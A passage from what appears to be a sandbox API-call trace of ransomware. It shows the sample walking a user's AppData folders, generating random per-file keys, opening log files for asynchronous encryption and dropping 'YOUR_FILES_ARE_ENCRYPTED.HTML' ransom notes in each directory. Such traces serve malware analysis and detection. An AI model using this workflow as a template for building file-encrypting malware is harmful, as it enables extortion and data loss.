param_1=0x19dda6, param_2="%02X" | out: param_1="97") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="C7") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="41") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="70") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D7") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="E7") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="38") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="D7") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="BD") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="CE") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D4") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="46") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="93") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="01") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="CA") returned 2 [0114.215] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="34") returned 2 [0114.215] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="31") returned 2 [0114.215] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="77") returned 2 [0114.216] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="A0") returned 2 [0114.216] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="AB") returned 2 [0114.216] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="D1") returned 2 [0114.216] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="DC") returned 2 [0114.216] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="EC") returned 2 [0114.216] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="EC") returned 2 [0114.216] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="C2") returned 2 [0114.216] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="D8") returned 2 [0114.216] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="0B") returned 2 [0114.216] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="58") returned 2 [0114.216] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_132742_c8c-c90.log" [0114.216] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.216] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.217] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2499e2e, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2499e2e, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x8b2a3f4c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xfa9c, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_134547_2bc-868.log", cAlternateFileName="IN58DE~1.LOG")) returned 1 [0114.217] StrStrIW (lpFirst="Install_2021-02-11_134547_2bc-868.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.217] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log") returned 107 [0114.217] PathFindExtensionW (pszPath="Install_2021-02-11_134547_2bc-868.log") returned=".log" [0114.217] lstrlenW (lpString=".log") returned 4 [0114.217] PathFindExtensionW (pszPath="Install_2021-02-11_134547_2bc-868.log") returned=".log" [0114.217] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install_2021-02-11_134547_2bc-868.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0114.218] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=64156) returned 1 [0114.218] GetProcessHeap () returned 0x600000 [0114.218] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0114.222] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="64") returned 2 [0114.222] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="B2") returned 2 [0114.222] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="B3") returned 2 [0114.222] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="3B") returned 2 [0114.222] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="CF") returned 2 [0114.222] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="7F") returned 2 [0114.222] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="0D") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="10") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="53") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="D3") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="A8") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="C9") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="A9") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="84") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="49") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="B2") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3E") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="0A") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="78") returned 2 [0114.223] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="D9") returned 2 [0114.223] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="7D") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="13") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="96") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="72") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="62") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="93") returned 2 [0114.223] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="6A") returned 2 [0114.223] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="9B") returned 2 [0114.223] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="6E") returned 2 [0114.223] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="E8") returned 2 [0114.223] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="9D") returned 2 [0114.223] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="75") returned 2 [0114.224] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install_2021-02-11_134547_2bc-868.log" [0114.224] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.224] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0114.228] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2499e2e, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd2499e2e, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x8b2a3f4c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xfa9c, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install_2021-02-11_134547_2bc-868.log", cAlternateFileName="IN58DE~1.LOG")) returned 0 [0114.231] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.231] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0114.231] GetProcessHeap () returned 0x600000 [0114.231] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.232] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.233] CloseHandle (hObject=0x324) returned 1 [0114.233] GetProcessHeap () returned 0x600000 [0114.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.233] GetProcessHeap () returned 0x600000 [0114.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.233] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6630871f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6630871f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="logs", cAlternateFileName="")) returned 0 [0114.233] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.233] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0114.234] GetProcessHeap () returned 0x600000 [0114.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.234] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.235] CloseHandle (hObject=0x31c) returned 1 [0114.235] GetProcessHeap () returned 0x600000 [0114.235] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.235] GetProcessHeap () returned 0x600000 [0114.235] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.236] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b49234, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b49234, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="setup", cAlternateFileName="")) returned 0 [0114.236] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.236] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0114.237] GetProcessHeap () returned 0x600000 [0114.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.237] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.238] CloseHandle (hObject=0x320) returned 1 [0114.238] GetProcessHeap () returned 0x600000 [0114.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.238] GetProcessHeap () returned 0x600000 [0114.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.239] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11bc67, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Outlook", cAlternateFileName="")) returned 1 [0114.239] StrStrIW (lpFirst="Outlook", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.239] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook") returned 57 [0114.240] GetProcessHeap () returned 0x600000 [0114.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.240] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook" [0114.240] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\*" [0114.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11bc67, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.241] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11bc67, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.241] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11cf49, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="gliding", cAlternateFileName="")) returned 1 [0114.241] StrStrIW (lpFirst="gliding", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.241] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned 65 [0114.241] GetProcessHeap () returned 0x600000 [0114.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.241] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding" [0114.241] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*" [0114.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11cf49, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f4d4, dwReserved1=0x60f460, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.241] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11cf49, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f4d4, dwReserved1=0x60f460, cFileName="..", cAlternateFileName="")) returned 1 [0114.242] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11cf49, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f4d4, dwReserved1=0x60f460, cFileName="..", cAlternateFileName="")) returned 0 [0114.242] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.242] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0114.242] GetProcessHeap () returned 0x600000 [0114.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\outlook\\gliding\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.242] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.243] CloseHandle (hObject=0x31c) returned 1 [0114.243] GetProcessHeap () returned 0x600000 [0114.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.243] GetProcessHeap () returned 0x600000 [0114.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.244] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11cf49, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="gliding", cAlternateFileName="")) returned 0 [0114.244] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.244] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0114.244] GetProcessHeap () returned 0x600000 [0114.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.245] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.246] CloseHandle (hObject=0x320) returned 1 [0114.246] GetProcessHeap () returned 0x600000 [0114.246] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.246] GetProcessHeap () returned 0x600000 [0114.246] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.248] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="PlayReady", cAlternateFileName="PLAYRE~1")) returned 1 [0114.248] StrStrIW (lpFirst="PlayReady", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.248] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady") returned 59 [0114.248] GetProcessHeap () returned 0x600000 [0114.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.249] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady" | out: 